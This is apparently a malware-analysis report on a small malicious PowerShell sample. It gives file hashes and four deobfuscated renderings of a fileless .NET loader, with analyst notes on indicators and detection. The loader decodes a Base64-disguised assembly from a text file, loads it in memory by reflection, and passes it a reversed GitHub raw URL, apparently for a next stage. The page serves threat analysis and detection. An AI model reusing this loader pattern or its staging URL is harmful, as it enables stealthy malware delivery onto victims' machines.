Malicious
Malicious

288e28ea13225c33394aee9d2d8e4c02

PowerShell
MD5: 288e28ea13225c33394aee9d2d8e4c02
Size: 1.31 KB
application/x-powershell
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
288e28ea13225c33394aee9d2d8e4c02
Sha1
ead8f8d3fdf1f35cba0672755a7c8a02c27378be
Sha256
363051592819af125a1b2b5e7b286d7e782267f41e4699db78c91fac2c0b26ee
Sha384
3db6dc47f510e586a46f332a181d4a8c35affbc65ade4ad090f242deb6dc4e207f2d4ce85837821ead6c596cd2e2476f
Sha512
6c7a38fb4d4c59c6adcf90961b6b53e85f591cb7702c5c504387a18ef08b8c4ad1fb4680ae849a2774ea9c0ce4db453cb4d665b5e43d8ef66762a001d380d8e4
SSDeep
24:Qlv4o4Kzyu52U/tMlBygklBRlB0P8wPMuZJBlBMwA6PFv+F5TqJMJ:A4oPtM7ktApDPwF5TbJ
TLSH
63219210AAFC8E157673DA0587BAE09059767ADCDD35C70CC354C10C06AE9449C56F37
File Structure
288e28ea13225c33394aee9d2d8e4c02
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
Value
Deobfuscated PowerShell

# Analyst notes (deobfuscated artefact; the statements appear on one physical line
# here, so statement separators were presumably lost in the report rendering).
#
# Purpose: in-memory .NET loader stage. Step by step, as visible in the code:
#   1. $nDxWq holds a URL written back-to-front: the literal ends in "//:sptth" and
#      contains "moc.tnetnocresubuhtig.war". Read right-to-left it is
#      hxxps://raw[.]githubusercontent[.]com/antoniovelez19881-bit/INVITADOS/refs/heads/main/2424GG.txt
#      (defanged). This script never reverses it; presumably the invoked method does.
#   2. $x points at C:\ProgramData\Lwoqo.txt, which is read as UTF-8 text. Nothing here
#      creates that file, so it was presumably staged by an earlier step - confirm.
#   3. A run of asterisks in that text is replaced with "A" before Base64 decoding,
#      i.e. the on-disk blob is not valid Base64 until the marker is substituted.
#   4. The decoded bytes are passed to [AppDomain]::CurrentDomain.Load(), which loads a
#      .NET assembly from a byte array; this step writes no assembly to disk.
#   5. Type "FjrD.LzKWm", method "WmJZZ" is resolved by reflection and invoked.
#      $yGpIW is never assigned in this listing, so the target object is presumably
#      $null (a static method) - confirm against the decoded assembly.
#   6. Six string arguments are passed: the reversed URL, a .vbs path under
#      C:\Users\Admin\AppData\Local\Temp, a filler string of underscores and dashes,
#      "0", "1" and "caca". Their meaning is not established by this listing.
# Member names are written as quoted strings ("replace", "Load", "Invoke"), an
# obfuscation residue that avoids the plain .Method( spelling.
$nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] (@(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\_71c79c58dc14cf56ff1c7c4dea1894b4b4d9794a84abb0cc65168a99c0429c69.vbs", "____________________________________________-------", "0", "1", "caca")))

Deobfuscated PowerShell

# Analyst notes: same loader logic as the other "Deobfuscated PowerShell" artefacts on
# this page (read C:\ProgramData\Lwoqo.txt, swap the asterisk marker for "A",
# Base64-decode, load the bytes as a .NET assembly, invoke FjrD.LzKWm::WmJZZ).
# What differs in this rendering is only the shape of the final argument: the six-string
# array is wrapped in a script block, `@({ @( ... ) })`, inside an extra pair of
# parentheses. Taken literally that would cast a one-element array holding a script block
# to [object[]], not six strings, so this form is presumably an intermediate output of
# the deobfuscator, not what actually ran - confirm against the raw sample.
# The strings themselves (reversed URL, paths, type and method names) are unchanged.
$nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] (@({ @(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\_71c79c58dc14cf56ff1c7c4dea1894b4b4d9794a84abb0cc65168a99c0429c69.vbs", "____________________________________________-------", "0", "1", "caca") } )))

Deobfuscated PowerShell

# Analyst notes: indicators that can be lifted directly from this listing.
#   - Host artefact: C:\ProgramData\Lwoqo.txt, read as UTF-8 and treated as Base64 once
#     the asterisk marker is replaced with "A". The file holds the encoded assembly.
#   - Network indicator: $nDxWq is a reversed https URL on raw.githubusercontent.com
#     (the literal ends in "//:sptth"); proxy or DNS logs would show the forward form.
#   - .NET entry point: type "FjrD.LzKWm", method "WmJZZ", resolved by reflection on the
#     assembly returned by [AppDomain]::CurrentDomain.Load().
#   - Script path argument: a .vbs file under C:\Users\Admin\AppData\Local\Temp whose
#     name is an underscore followed by 64 hex characters (SHA-256-shaped). "Admin" and
#     the hash-style name presumably come from the analysis sandbox - confirm before
#     using the path as a field indicator.
#   - The remaining arguments ("0", "1", "caca" and the underscore/dash filler) are
#     passed through unchanged; this listing does not show how they are used.
# The argument array is wrapped in a script block here; see the raw sample for the
# form that actually executed.
$nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] @({ @(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\_71c79c58dc14cf56ff1c7c4dea1894b4b4d9794a84abb0cc65168a99c0429c69.vbs", "____________________________________________-------", "0", "1", "caca") } ))

Deobfuscated PowerShell

# Analyst notes: detection-relevant behaviour visible in this listing.
#   - The payload never has to exist on disk as a PE: the only file read is a text file
#     (C:\ProgramData\Lwoqo.txt) whose content becomes valid Base64 only after the
#     asterisk run is replaced with "A". A scan of that file for Base64-encoded
#     executables would therefore miss it unless the substitution is applied first.
#   - The decoded bytes go straight to [AppDomain]::CurrentDomain.Load(), so the assembly
#     is loaded from memory inside the PowerShell process.
#   - Useful telemetry for this pattern: PowerShell script block logging (event ID 4104)
#     and AMSI, both of which see the script text after outer obfuscation layers are
#     removed. The strings "FromBase64String", "CurrentDomain", "Load", "GetMethod" and
#     "Invoke" all appear literally, although quoted as member names.
#   - A Get-Content on a .txt under C:\ProgramData followed by reflection calls in the
#     same script block is the combination worth alerting on; either alone is common.
# $yGpIW (the Invoke target) is not assigned anywhere in this listing.
$nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] @({ @(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\_71c79c58dc14cf56ff1c7c4dea1894b4b4d9794a84abb0cc65168a99c0429c69.vbs", "____________________________________________-------", "0", "1", "caca") } ))

288e28ea13225c33394aee9d2d8e4c02 (1.31 KB)